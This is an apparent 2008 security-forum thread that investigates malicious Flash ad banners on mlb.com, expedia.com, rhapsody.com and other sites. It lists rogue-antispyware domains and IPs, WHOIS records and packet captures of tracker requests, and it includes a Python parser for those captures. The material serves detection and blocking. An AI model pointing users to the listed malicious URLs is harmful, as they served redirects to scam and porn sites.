  57. Marketingdungeon.com
  58. Mediatornado.com
  59. Megashopcity.com
  60. Mightyfaq.com
  61. Misc-search.com
  62. Mobilesoftmarketing.com
  63. Moneycometrue.com
  64. Moneypalacecash.com
  65. Myfavouritesearch.com
  66. Myhealth-life.org
  67. Myonlinefinance.com
  68. Mysurvey4u.com
  69. Mythmarketing.com
  70. Mytravelgeek.com
  71. Netturbopro.com
  72. Onestopshopz.com
  73. Opensols.com
  74. Pcsoftw.com
  75. Pcsupercharger.com
  76. Popadprovider.com
  77. Popsmedia.com
  78. Popupnukerpro.com
  79. Prenetsearch.com
  80. Prevedmarketing.com
  81. Prizesforyou.com
  82. R2d2adverising.com
  83. Rocktheads.com
  84. Roller-search.com
  85. Rombic-search.com
  86. Searchcolours.com
  87. Sellmoresoft.com
  88. Selvascreensaver.com
  89. Sharpadverts.com
  90. Shivanetworking.com
  91. Shopshot.com
  92. Softwcs.com
  93. Stratosearch.com
  94. Swiftcleaner.com
  95. Tallgrass-seach.com
  96. Traffalo.com
  97. Traveltray.com
  98. Uniqads.com
  99. Vitecmedia.com
  100. Waytotheprofit.com
  101. Windefender.com
  102. Wontu-search.com
  103. Workhomecenter.com
  104. Yourseeker.com
  105. Yourshopz.com
  106. Yourteacheronline.com
  107. Zappinads.com
  108. Zooworld-search.com
<h4>
84.243.253.220
</h4>
  1. Anonymbrowser.com
  2. Blablahost.com
  3. Errordigger.com
  4. Errorinspector.com
  5. Passwordinspector.com
  6. Performanceoptimizer.com
  7. Sellmosoft.net
  8. Internetsupernanny.com
<h4>
77.91.229.103
</h4>
  1. Malware-scan.com
  2. Xmalware-scan.com
<h4>
77.91.229.104
</h4>
  1. scanner2.malware-scan.com
<h4>
67.55.81.200
</h4>
  1. Accelerateurmaligne.com
  2. Aceleradorlisto.com
  3. Addioerrori.com
  4. Adremversneller.com
  5. Anonymwinpc.com
  6. Antimalwareshield.com
  7. Antispywarecontrole.com
  8. Antispywarecontrollo.com
  9. Antispywarekontrolle.com
  10. Antispywareseigyo.com
  11. Antivirusgereedschap.com
  12. Antivirusscherm.com
  13. Antivirussolusjon.com
  14. Aucunsvirus.com
  15. Avsystemcare.com
  16. Bedsteantivirus.com
  17. Bereiniger.com
  18. Cleverspeeder.com
  19. Controlantiespia.com
  20. Defectshuri.com
  21. Doraibuhogo.com
  22. Easysprinter.com
  23. Echterschutz.com
  24. Effaceurvirus.com
  25. Elevarendimiento.com
  26. Enkelsprinter.com
  27. Errclean.com
  28. Erreurchasseur.com
  29. Fiksfeil.com
  30. Fixmenaces.com
  31. Handigebeheerder.com
  32. Harddrevvagt.com
  33. Hataduzelticisi.com
  34. Herramientadereparacion.com
  35. Hukommelsesbeskytter.com
  36. Hulpprogramma.com
  37. Kansennashi.com
  38. Kantansprinter.com
  39. Keinespuren.com
  40. Keinestoerungen.com
  41. Klogspeeder.com
  42. Klugerspeeder.com
  43. Kontentsueraser.com
  44. Kvikkpc.com
  45. Kyoishusei.com
  46. Leichtersprinter.com
  47. Lettsprinter.com
  48. Liberapc.com
  49. Lifelongpc.com
  50. Maskinpcpro.com
  51. Megaviruskit.com
  52. Megliopc.com
  53. Melhorpc.com
  54. Memoiredefenseur.com
  55. Mendingtool.com
  56. Minnesverktyg.com
  57. Moncontenuassistant.com
  58. Msahihalakhtaa.com
  59. Nemsprinter.com
  60. Nettoyagevirus.com
  61. Nientevirus.com
  62. Nochanceforvirus.com
  63. Noespias.com
  64. Nulinfektioner.com
  65. Ottimizzaveloce.com
  66. Pasokoneiju.com
  67. Pcforbedring.com
  68. Pclyftare.com
  69. Pcohneviren.com
  70. Pcoppdrettere.com
  71. Pcopschoner.com
  72. Pcopschoningsstel.com
  73. Pcraiser.com
  74. Pcreveil.com
  75. Pcsamensteller.com
  76. Pcscattista.com
  77. Pcschirmer.com
  78. Pcverdediger.com
  79. Performancekoujou.com
  80. Privacidadplus.com
  81. Protectioncomplete.com
  82. Puliscitutto.com
  83. Pulitasystem.com
  84. Rendator.com
  85. Rensningverktyg.com
  86. Reparameacas.com
  87. Reparamenazas.com
  88. Reparetudo.com
  89. Scattofacile.com
  90. Shufukutsuru.com
  91. Sicheressystem.com
  92. Sininfecciones.com
  93. Smartkasoku.com
  94. Smartokare.com
  95. Sprinterfacile.com
  96. Sprinterpc.com
  97. Sysdepannage.com
  98. Syskontroller.com
  99. Systemfreigabe.com
  100. Systemreiniging.com
  101. Tabortvirus.com
  102. Temizsurucu.com
  103. Utiledeprotection.com
  104. Varrevirus.com
  105. Velocidadsimple.com
  106. Vigilamenazas.com
  107. Virenloescher.com
  108. Virenstopper.com
  109. Virtual-leatherman.com
  110. Virusfjernere.com
  111. Virusudryddet.com
  112. Winadsiz.com
  113. Winanonyme.com
  114. Winanonymitet.com
  115. Winanzen.com
  116. Winbescherming.com
  117. Windefensa.com
  118. Windifesavirale.com
  119. Winhogo.com
  120. Winkujoenjin.com
  121. Winpcalmeglio.com
  122. Winpcdocteur.com
  123. Winpcdoktor.com
  124. Winpckontroll.com
  125. Winpcrensare.com
  126. Winpcrensere.com
  127. Winriservatezza.com
  128. Winsecurite.com
  129. Winsikkerantivirus.com
  130. Winsikretav.com
  131. Winsurffilter.com
  132. Wintemizleyicisi.com
  133. Wintrygghet.com
  134. Wirusumuryokuka.com
  135. Yoursystemguard.com
<h4>
87.117.252.11
</h4>
  1. Acchiappavirus.com
  2. Adiosvirus.com
  3. Ahorrememoria.com
  4. Altalimpeza.com
  5. Anonimutente.com
  6. Antiamenazas.com
  7. Antiespiamaestro.com
  8. Antievidence.com
  9. Antispionimaestro.com
  10. Antispywareconductor.com
  11. Antispywarecontrol.com
  12. Antispywaremaster.com
  13. Antispywaremeister.com
  14. Antispywaresuite.com
  15. Antivirusfiable.com
  16. Antivirusforall.com
  17. Antivirusforalla.com
  18. Antivirusforalle.com
  19. Antivirusfueralle.com
  20. Antivirusgenial.com
  21. Antivirusmagique.com
  22. Antivirusparatodos.com
  23. Antiviruspcsuite.com
  24. Anzentsuru.com
  25. Apagahistorico.com
  26. Apolloantivirus.com
  27. Archivosenestado.com
  28. Atemaiserro.com
  29. Atrapavirus.com
  30. Aucunchoixpourvirus.com
  31. Aucunefaute.com
  32. Aucuninfection.com
  33. Aucunmenace.com
  34. Aucunserreurs.com
  35. Avcompleto.com
  36. Avsecurityplus.com
  37. Avseguro.com
  38. Bandoaivirus.com
  39. Bandoalleinfezioni.com
  40. Barreraintegral.com
  41. Bastioneantivirus.com
  42. Beschermingstool.com
  43. Beskyttelseonline.com
  44. Beskyttendevaerktoj.com
  45. Bestsellerantivirus.com
  46. Blanchdisc.com
  47. Borresuspasos.com
  48. Bossedeserreurs.com
  49. Brossedesfautes.com
  50. Bugseraser.com
  51. Caiforavirus.com
  52. Ceroamenazas.com
  53. Cerovirus.com
  54. Chasseurdeserreures.com
  55. Cleanerpotente.com
  56. Cleanpctool.com
  57. Cleanuptool.com
  58. Confidentsurf.com
  59. Confidentuser.com
  60. Contenidoseguros.com
  61. Contenteraser.com
  62. Controledemenaces.com
  63. Controlloreprivacy.com
  64. Curerrores.com
  65. Dataconfidentiality.com
  66. Defensaantivirus.com
  67. Defensecelebre.com
  68. Defensededriver.com
  69. Defensedinformation.com
  70. Defensedudisque.com
  71. Defensenetsurfage.com
  72. Defensivesystem.com
  73. Dejitarufukugen.com
  74. Dejitarukyoikira.com
  75. Dejitaruwakuchin.com
  76. Detapurotekuta.com
  77. Detaripea.com
  78. Detectaerrores.com
  79. Discoseguro.com
  80. Diskassistent.com
  81. Diskretter.com
  82. Disksaeuberung.com
  83. Disksizesaver.com
  84. Disksparare.com
  85. Disukushuri.com
  86. Doubledefender.com
  87. Driversecurise.com
  88. Einwandfreierpc.com
  89. Eliminadordeamenazas.com
  90. Elmejorantivirus.com
  91. Emperahogo.com
  92. Enmiendaerrores.com
  93. Equipoantiespia.com
  94. Eracheisa.com
  95. Erasutoppu.com
  96. Errorfighter.com
  97. Essentialeraser.com
  98. Expertdantispyware.com
  99. Exterminadordevirus.com
<h4>
24.244.171.69
</h4>
<h4>
193.227.121.34
</h4>
  1. Superiordatingsite.com
  2. Surveypaiz.com
<h4>
24.244.170.178
</h4>
  1. statsgod.com
<h4>
Associated IP's (download centers)
</h4>
content.onerateld.com - 209.8.114.5

canonical name g1.panthercdn.com
Domain Name: ONERATELD.COM
Registrar: YESNIC CO. LTD.
Name Server: NS1.ONERATELD.COM
Name Server: NS2.ONERATELD.COM
Updated Date: 07-dec-2007
Creation Date: 26-dec-2006
Expiration Date: 26-dec-2008

sec.storageguardsoft.com - 209.8.114.8

canonical name g1.panthercdn.com
Domain Name: STORAGEGUARDSOFT.COM
Registrar: YESNIC CO. LTD.
Name Server: NS9.NSCACHE.NET
Name Server: NS8.NSCACHE.NET
Updated Date: 03-dec-2007
Creation Date: 07-dec-2006
Expiration Date: 07-dec-2008

<h4>
Other domains hosting gnida.swf
</h4>
aheadad.com - 205.252.251.18

Server Type: Apache/1.3.37 (Unix) PHP/5.2.3
IP Location - Alaska - Ketchikan - Beyond The Network America Inc
Reverse IP: 7 other sites hosted on this server.

::Domain servers in listed order::
ns2.ah-dns.com
ns1.ah-dns.com

::Dates & Status::
Creation Date: 12-Oct-2007
Expiration Date: 12-Oct-2008
Status:ACTIVE

Websites.
  1. Aheadad.com
  2. Fuckmomsladyfriend.com
  3. Gayfunworld.com
  4. Gayteenplace.com
  5. Hotfreebbw.com
  6. Onlyshemale.net
  7. Plumppornvideo.com
  8. Windowssecurecenter.com
Kimberly
Flash swf files hit the news again. Unfortunately this time we are not talking about redirects to fake spyware alerts but about getting redirected to a porn site with streaming video content.

An advertisement for Chanel watches hosted by ad.doubleclick and shown on The Official Site of Major League Baseball (mlb.com) is indeed redirecting people to hqtube.com.
The advert in question is ad.doubleclick.net/1674952/mlb_chanel.swf
Again you can find the culprit by examining the HTTP referers when you enter the hqtube.com website. Furthermore hqtube.com sets a cookie containing a reference to the same ad.doubleclick swf file.
The user is also prompted to install the Chinese language pack when entering hqtube.com.

Mlb.com has a page for people with slow connections. It doesn’t play the flash adverts. If you don’t want to block ads or disable Flash, use that link instead of the normal homepage. You won’t get redirected.

Narrow broadband link:
http://mlb.mlb.com/mlb/homepage/narrowband.jsp

Full story by Sandi Hardmeier.
MLB.COM users hijacked and redirected to pornographic web site, complete with graphic videos - DOUBLECLICK involved

<h4>
hqtube.com - 88.85.66.116
</h4>
Server Type: nginx/0.3.51
IP Location - Utrecht - Utrecht - Webazilla

Registration Service Provided By: Enom, Inc

Administrative Contact:
ICOO SOFT LTD
Vadim Fatkullin ()
+357.25341300
Fax: +357.25342030
Gladstonos 120-C2
Lemesos, 3032
CY

Status: Locked

Name Servers:
ns1.serverfield.com
ns2.serverfield.com
ns3.serverfield.com
ns4.serverfield.com

Creation date: 14 Aug 2006 14:42:05
Expiration date: 14 Aug 2008 14:42:05

Websites hosted on 88.85.66.116
  1. Filespray.com
  2. Hqtube.com
Kimberly
<h4>
newbieadguide.com - vozemiliogaranon.com - thetechnorati.com - akamahi.net - ?
</h4>
Time to update your IP blocks; the guys moved ...
91.199.50.14 - akamahi.net
91.199.50.15 - newbieadguide.com
91.199.50.16 - thetechnorati.com
91.199.50.17 - vozemiliogaranon.com
91.199.50.18 - ?

91.199.50.14 - 91.199.50.18

QUOTE
inetnum: 91.199.50.0 - 91.199.50.255
netname: NETROUTING-01
descr: Netrouting Data Facilities
country: NL
org: ORG-NDF1-RIPE
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: ECATEL-MNT
mnt-routes: ECATEL-MNT
mnt-domains: ECATEL-MNT
source: RIPE # Filtered

organisation: ORG-NDF1-RIPE
org-name: Netrouting Data Facilities
org-type: OTHER
address: Van Halewijnlaan 319
address: 2274 TK Voorburg
address: The Netherlands
phone: +31 654 620 994
abuse-mailbox:
mnt-ref: GFX-MNT
mnt-by: GFX-MNT
source: RIPE # Filtered

person: S Bout
org: ORG-NDF1-RIPE
address: Van Halewijnlaan 319
address: 2274 TK Voorburg
address: The Netherlands
phone: +31 654 620 994
nic-hdl: SBT10-RIPE
source: RIPE # Filtered

route: 91.199.50.0/24
descr: Netrouting Data Facilities
origin: AS16131
mnt-by: GFX-MNT
source: RIPE # Filtered
As always keep an eye on Sandi Hardmeier's blog too.
http://msmvps.com/blogs/spywaresucks/default.aspx
Kimberly
And the move keeps going on!

mysurvey4u.com - 194.110.67.22

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities
Domain Name : mysurvey4u.com

::Name Servers::
ns1.mysurvey4u.com
ns2.mysurvey4u.com

::Dates & Status::
Created Date 2006-12-04 09:57:28 EST
Updated Date 2007-12-03 20:06:35 EST
Valid Date 2008-12-04 09:57:28 EST
Status ACTIVE

Websites
  1. Mysurvey4u.com
  2. Singlemetro.com
______________________________

traveltray.com - 194.110.67.23

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Name Servers::
NS1.TRAVELTRAY.COM 190.15.73.251
NS2.TRAVELTRAY.COM 190.15.73.252

::Dates & Status::
Record last updated on 02-Jun-2007.
Record expires on 01-Jul-2008.
Record created on 01-Jul-2004.
Domain status: clientTransferProhibited - clientUpdateProhibited

Websites
  1. Specificissue.com
  2. Traveltray.com
______________________________

netmediagroup.net - 84.243.252.91

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: netmediagroup.net is hosted on a dedicated server.

::Name Servers::
ns1.netmediagroup.net
ns2.netmediagroup.net

::Dates & Status::
Created Date 2006-06-29 05:38:33 EDT
Updated Date 2007-06-27 17:59:00 EDT
Valid Date 2008-06-29 05:38:33 EDT
Status ACTIVE
______________________________

traffalo.com - 84.243.252.94

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: traffalo.com is hosted on a dedicated server.

::Name Servers::
NS1.TRAFFALO.COM 190.15.73.251
NS2.TRAFFALO.COM 190.15.73.252

::Dates & Status::
Record last updated on 26-Apr-2007.
Record expires on 13-Apr-2008.
Record created on 13-Apr-2007.
Domain status: clientTransferProhibited - clientUpdateProhibited
______________________________

uniqads.com - 84.243.252.97

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: uniqads.com is hosted on a dedicated server.

::Name Servers::
NS2.UNIQADS.COM 190.15.73.252
NS1.UNIQADS.COM 190.15.73.251

::Dates & Status::
Record last updated on 08-Jun-2007.
Record expires on 27-Apr-2008.
Record created on 27-Apr-2007.
Domain status: ok

<h4>
Blocks
</h4>
inetnum: 84.243.221.0 - 84.243.221.255
netname: GFX-CUST-NETROUTING
descr: Netrouting Data Facilities
org: ORG-NDF1-RIPE
country: NL
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PA
mnt-by: GFX-MNT

inetnum: 194.110.67.0 - 194.110.67.255
netname: NETROUTING-01
descr: Netrouting Data Facilities
country: NL
org: ORG-NDF1-RIPE
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: GFX-MNT
mnt-routes: GFX-MNT
mnt-domains: GFX-MNT

inetnum: 91.199.50.0 - 91.199.50.255
netname: NETROUTING-01
descr: Netrouting Data Facilities
country: NL
org: ORG-NDF1-RIPE
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: ECATEL-MNT
mnt-routes: ECATEL-MNT
mnt-domains: ECATEL-MNT
Kimberly
<h4>
akamahi.net - newbieadguide.com - thetechnorati.com - vozemiliogaranon.com
</h4>
Time to update your IP blocks (again).

64.38.4.131 - akamahi.net
64.38.4.133 - newbieadguide.com
64.38.4.134 - thetechnorati.com
64.38.62.234 - vozemiliogaranon.com

64.38.0.0 - 64.38.63.255

QUOTE
OrgName: FastServers, Inc.
OrgID: FASTS-1
Address: 175 W. Jackson Blvd
Address: Suite 1770
City: Chicago
StateProv: IL
PostalCode: 60604
Country: US

ReferralServer: rwhois://rwhois.fastservers.net:4321/

NetRange: 64.38.0.0 - 64.38.63.255
CIDR: 64.38.0.0/18
NetName: FASTSERVERS-CF
NetHandle: NET-64-38-0-0-1
Parent: NET-64-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.FASTSERVERS.NET
NameServer: NS2.FASTSERVERS.NET
Comment:
RegDate: 2005-07-12
Updated: 2006-03-22

== Additional Information From rwhois://rwhois.fastservers.net:4321/ ==

network:Class-Name:network
network:ID:64-38-62-232-29.64.38.0.0/18
network:Auth-Area:64.38.0.0/18
network:Network-Name:64-38-62-232/29
network:IP-Network:64.38.62.232/29
network:Organization;I:CID-21976.64.38.0.0/18
network:Tech-Contact;I:
network:Admin-Contact;I:
network:Updated:20080111
network:Updated-By:

network:Class-Name:network
network:ID:FASTSERVERS-CF.64.38.0.0/18
network:Auth-Area:64.38.0.0/18
network:Network-Name:CF-64.38.0.0
network:IP-Network:64.38.0.0/18
network:Organization;I:FastServers, Inc
network:Tech-Contact;I:
network:Admin-Contact;I:FASTS-ARIN
network:Created:20050913
network:Updated:20060322
network:Updated-By:


Resolve Host: server1.cpvadvertizing.com

A cpvadvertizing.com
PTR server1.cpvadvertizing.com
NS ns1.cpvadvertizing.com 85.17.4.1
NS ns2.cpvadvertizing.com 85.17.4.2
IP's using PTR to this host:
  • 64.38.4.130
  • 64.38.4.131
  • 64.38.4.132
  • 64.38.4.133
  • 64.38.4.134
  • 64.38.62.234
Kimberly
<h4>
Other domains hosting gnida.swf
</h4>
More Netrouting Data Facilities

workhomecenter.com - 194.110.67.25

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Domain servers in listed order::
NS1.WORKHOMECENTER.COM 190.15.73.251
NS2.WORKHOMECENTER.COM 190.15.73.252

::Dates & Status::
Record last updated on 22-May-2007.
Record expires on 28-Feb-2008.
Record created on 28-Feb-2002.
Domain status: ok

Websites.
  1. Theirtrade.com
  2. Workhomecenter.com
______________________________

casinoaceking.com - 194.110.67.19

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Domain servers in listed order::
NS2.CASINOACEKING.COM 190.15.73.252
NS1.CASINOACEKING.COM 190.15.73.251

::Dates & Status::
Record last updated on 10-Dec-2007.
Record expires on 09-Jan-2009.
Record created on 09-Jan-2002.
Domain status: ok

Websites.
  1. Casinoaceking.com
  2. Regularhelp.com
______________________________

getfreecar.com - 194.110.67.22

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Domain servers in listed order::
NS1.GETFREECAR.COM 190.15.73.251
NS2.GETFREECAR.COM 190.15.73.252

::Dates & Status::
Record last updated on 05-Sep-2007.
Record expires on 07-Jul-2008.
Record created on 07-Jul-2003.
Domain status: ok

Websites.
  1. Getfreecar.com
  2. Singledaily.com
______________________________

gnida.swf is present on each of these domains.
Kimberly
In case you are curious how these redirects work, you can watch the video below. Unless explicitly clicked, most windows are closed using ALT+F4.
Note: Flash Player is needed.

The malicious banner on DiePresse.com is still active at the time of the writeup, so block or turn off Flash if you surf over there.
Kimberly
<h4>
www.rhapsody.com
</h4>
The campaign on DiePresse has been suspended but the banner is still hosted on their server. A new banner was reported recently on www.rhapsody.com. The redirect doesn't occur when you enter the site. Searching for music or artists brings up the malicious advert. The file is hosted at i.realone.com and it's again the skyauction banner as seen below.

CODE
Frame 265 (452 bytes on wire, 452 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: newbieadguide.com (190.15.64.188)
Transmission Control Protocol, Src Port: 1980 (1980), Dst Port: http (80), Seq: 1, Ack: 1, Len: 398
Hypertext Transfer Protocol
    GET /statsa.php?u=23423424&campaign=mi1eroof HTTP/1.1\r\n
    Accept: */*\r\n
    Referer: http://i.realone.com/ads/Rollingstone/1_skyauction_728x90.swf?
clickTag=http://ad.doubleclick.net/click%3Bh=v8/3652/3/0/%2a/x%3B177176445%3B0\r\n
    x-flash-version: 9,0,47,0\r\n
    ~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: newbieadguide.com\r\n
    Connection: Keep-Alive\r\n
    \r\n
Banner: i.realone.com/ads/Rollingstone/1_skyauction_728x90.swf
Campaign: newbieadguide.com/statsa.php?u=23423424&campaign=mi1eroof

In the meantime the bad guys kept on moving. They stayed a couple of days on Denit Internet Services in Amsterdam and now they are on the following IPs:

190.15.64.185 - akamahi.net
190.15.64.186 - ? - GET /swf/gnida.swf = ok
190.15.64.187 - ? - GET /swf/gnida.swf = ok
190.15.64.188 - newbieadguide.com
190.15.64.189 - ? - GET /swf/gnida.swf = ok
190.15.64.190 - quinquecahue.com
190.15.64.191 - thetechnorati.com
190.15.64.192 - vozemiliogaranon.com

QUOTE
% Joint Whois - whois.lacnic.net
% This server accepts single ASN, IPv4 or IPv6 queries


% Copyright LACNIC lacnic.net
% The data below is provided for information purposes
% and to assist persons in obtaining information about or
% related to AS and IP numbers registrations
% By submitting a whois query, you agree to use this data
% only for lawful purposes.
% 2008-01-25 15:11:36 (BRST -02:00)

inetnum: 190.15.64/20
status: allocated
owner: Secure Hosting Ltd.
ownerid: HN-SHLT-LACNIC
responsible: Secure Hosting Ltd.
address: Bufete Osorio, Edificio Palmira, --, 4th Floor
address: -- - Tegucigalpa - DC
country: HN
phone: +1 242 5028700 []
owner-c: RID2
tech-c: RID2
inetrev: 190.15.64/20
nserver: NS1.SECUREHOST.COM
nsstat: 20080121 AA
nslastaa: 20080121
nserver: NS2.SECUREHOST.COM
nsstat: 20080121 AA
nslastaa: 20080121
created: 20061006
changed: 20061006

nic-hdl: RID2
person: Richard Douglas
e-mail: support@SECUREHOST.COM
address: P.O. Box CB-13862, 00000,
address: CB13862 - Nassau - NP
country: BS
phone: +1 242 5028700
created: 20060127
changed: 20061006

% whois.lacnic.net accepts only direct match queries.
% Types of queries are: POCs, ownerid, CIDR blocks, IP
% and AS numbers.
Kimberly
<h4>
www.expedia.com
</h4>
This weekend we got some echoes about a malicious advertising banner on www.expedia.com. The campaign is very restrictive as most of the worldwide countries & continents are excluded. While visiting www.expedia.com, one advertising banner caught my attention though; the flash file was again protected / obfuscated using SWF Encrypt 4.x as seen below.
Thanks fly out to Cretemonster for confirming & checking out the advert since my geographic location is on the ban list.
CODE
Frame 44 (387 bytes on wire, 387 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: quinquecahue.com (190.15.64.190)
Transmission Control Protocol, Src Port: 1042 (1042), Dst Port: http (80), Seq: 1, Ack: 1, Len: 333
Hypertext Transfer Protocol
    GET /statsa.php?u=1200655836&campaign=pygmalioni HTTP/1.1\r\n
    Accept: */*\r\n
    Accept-Language: en-US\r\n
    Referer: http://media.expedia.com/ads/FXSound/728x90.swf\r\n
    x-flash-version: 9,0,115,0\r\n
    Accept-Encoding: gzip, deflate\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: quinquecahue.com\r\n
    Connection: Keep-Alive\r\n
    \r\n
Banner: media.expedia.com/ads/FXSound/728x90.swf
Campaign: quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni

If someone does experience those SWF hijacks / redirects on other websites, don't hesitate to PM me about it. This needs to be stopped!
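The captures in the rhapsody.com and expedia.com posts above share one shape: a GET to statsa.php carrying u= and campaign=, with a Referer naming the banner SWF that fired it. The parser below is an added example, not a tool from this thread; it reads an Ethereal text export as posted here, joins the wrapped Referer line from the rhapsody capture, and reports the banner and campaign the way these posts do. The tracker host list is assembled from hosts named in the thread; the two sample dumps are constructed to match the posted captures.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Tracker hosts and scripts named in this thread; the "u=" / "campaign="
# query pair is what ties a hit to a campaign.
TRACKER_HOSTS = {
    "newbieadguide.com", "quinquecahue.com", "akamahi.net",
    "thetechnorati.com", "vozemiliogaranon.com", "mysurvey4u.com",
    "traveltray.com", "workhomecenter.com", "casinoaceking.com",
    "getfreecar.com", "human500.com",
}
TRACKER_PATHS = ("/statsa.php", "/statsg.php", "/swf/gnida.swf")

# Ethereal's text export shows the CRLF as the two literal characters \r\n.
CRLF = "\\r\\n"
REQUEST_LINE = re.compile(r"^(GET|POST)\s+(\S+)\s+HTTP/1\.[01]$")


def logical_lines(dump):
    """Yield the request line and headers of an Ethereal text dump.

    A long header (the Referer in the rhapsody capture) is wrapped onto a
    second physical line; only the last piece carries the literal \\r\\n,
    so pieces are joined until that terminator is seen.
    """
    buf = ""
    started = False
    for raw in dump.splitlines():
        line = raw.strip()
        if not started:
            started = line.startswith("Hypertext Transfer Protocol")
            continue
        buf += line
        if buf.endswith(CRLF):
            logical, buf = buf[:-len(CRLF)], ""
            if logical == "":
                return  # the empty line closes the header block
            yield logical


def parse_request(dump):
    """Return the fields worth keeping from one captured tracker request."""
    lines = list(logical_lines(dump))
    if not lines:
        raise ValueError("no HTTP section found in dump")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        raise ValueError("unexpected request line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    target = urlsplit(m.group(2))
    # The thread shows both "u=" and "U="; compare query keys case-insensitively.
    query = {k.lower(): v[0] for k, v in parse_qs(target.query).items()}
    referer = urlsplit(headers.get("referer", ""))
    host = headers.get("host", "")
    return {
        "host": host,
        "path": target.path,
        "campaign": query.get("campaign"),
        "u": query.get("u"),
        # The Referer is the banner SWF that issued the request: the culprit.
        "banner": referer.netloc + referer.path if referer.netloc else None,
        "flash_version": headers.get("x-flash-version"),
        "tracker_hit": host in TRACKER_HOSTS or target.path in TRACKER_PATHS,
    }


def summarise(rec):
    """Render the 'Banner:' / 'Campaign:' pair the thread uses to report a hit."""
    campaign = "%s%s?u=%s&campaign=%s" % (
        rec["host"], rec["path"], rec["u"], rec["campaign"])
    return "Banner: %s\nCampaign: %s" % (rec["banner"], campaign)


# Constructed samples laid out like the captures posted in this thread
# (private address masked as 192.168.x.x, as in the posts).
SAMPLE_EXPEDIA = r"""Frame 44 (387 bytes on wire, 387 bytes captured)
Hypertext Transfer Protocol
    GET /statsa.php?u=1200655836&campaign=pygmalioni HTTP/1.1\r\n
    Accept: */*\r\n
    Referer: http://media.expedia.com/ads/FXSound/728x90.swf\r\n
    x-flash-version: 9,0,115,0\r\n
    Host: quinquecahue.com\r\n
    Connection: Keep-Alive\r\n
    \r\n
"""

# Same layout with the wrapped Referer line seen in the rhapsody capture.
SAMPLE_RHAPSODY = r"""Hypertext Transfer Protocol
    GET /statsa.php?u=23423424&campaign=mi1eroof HTTP/1.1\r\n
    Referer: http://i.realone.com/ads/Rollingstone/1_skyauction_728x90.swf?
clickTag=http://ad.doubleclick.net/click%3Bh=v8/3652/3/0/%2a/x%3B177176445%3B0\r\n
    x-flash-version: 9,0,47,0\r\n
    Host: newbieadguide.com\r\n
    \r\n
"""
```

Feed `parse_request` the "Hypertext Transfer Protocol" section of any capture in this thread; a Referer that points at a legitimate site's own ad path (media.expedia.com, i.realone.com) is what tells a hijacked banner apart from a direct visit to the tracker.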
Kimberly
A search did reveal the existence of quite a few new banners / redirects over the last 48h. We all need your help because those banners target specific countries and block others. Below is a partial list of reported redirects on forums. If you know which banners are causing the redirects below or if you did experience such fake alerts, please contact me or Sandi.

When an advertising banner is found or when new campaigns pop up, I'll update this topic.

quinquecahue.com/swf/gnida.swf?campaign=tautonymus&u=1201174352
  • Reported at www.webzdarma.cz forums.
  • Allowed Country Codes - States / Cities - IP Ranges
    CZ, UA
  • Banned Country Codes - States / Cities - IP Ranges
    89.250.0.0-89.250.255.255
    prague
CODE
Frame 387 (413 bytes on wire, 413 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: quinquecahue.com (190.15.64.190)
Transmission Control Protocol, Src Port: 1190 (1190), Dst Port: http (80), Seq: 1, Ack: 1, Len: 359
Hypertext Transfer Protocol
    GET /statsa.php?u=1201174352&campaign=tautonymus HTTP/1.1\r\n
    Accept: */*\r\n
    Referer: http://i.wz.cz/bannery/firstchoice/firstchli.swf?clickthru=http://www.firstchoice.co.uk/?ref=A0991\r\n
    x-flash-version: 9,0,47,0\r\n
    ~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: quinquecahue.com\r\n
    Connection: Keep-Alive\r\n
    \r\n
Banner: i.wz.cz/bannery/firstchoice/firstchli.swf
______________________________

quinquecahue.com/swf/gnida.swf?campaign=atliverish&U=1200328388
  • Reported at eforum.idg.se.
  • Banned Country Code - States / Cities - IP Ranges
    85.18.0.0-85.18.255.255
    1.255.0.0-1.255.255.255
    7.3.0.0-7.3.255.255
    italy
    california, ohio
______________________________

quinquecahue.com/swf/gnida.swf?campaign=myrakehell&u=1200937882
  • Reported at trojaner-board.de and forum.chip.de
  • Allowed Country Codes - States / Cities - IP Ranges
    DE, AT, UA
  • Banned Country Code - City - IP
    88.198.0.0-88.198.255.255
    217.6.0.0-217.6.255.255
    dortmund, radibor, berlin
Banner was reported to be present at onlinetvrecorder.com in the downloads section (which needs membership). According to the forum moderator the banner has been removed...
______________________________

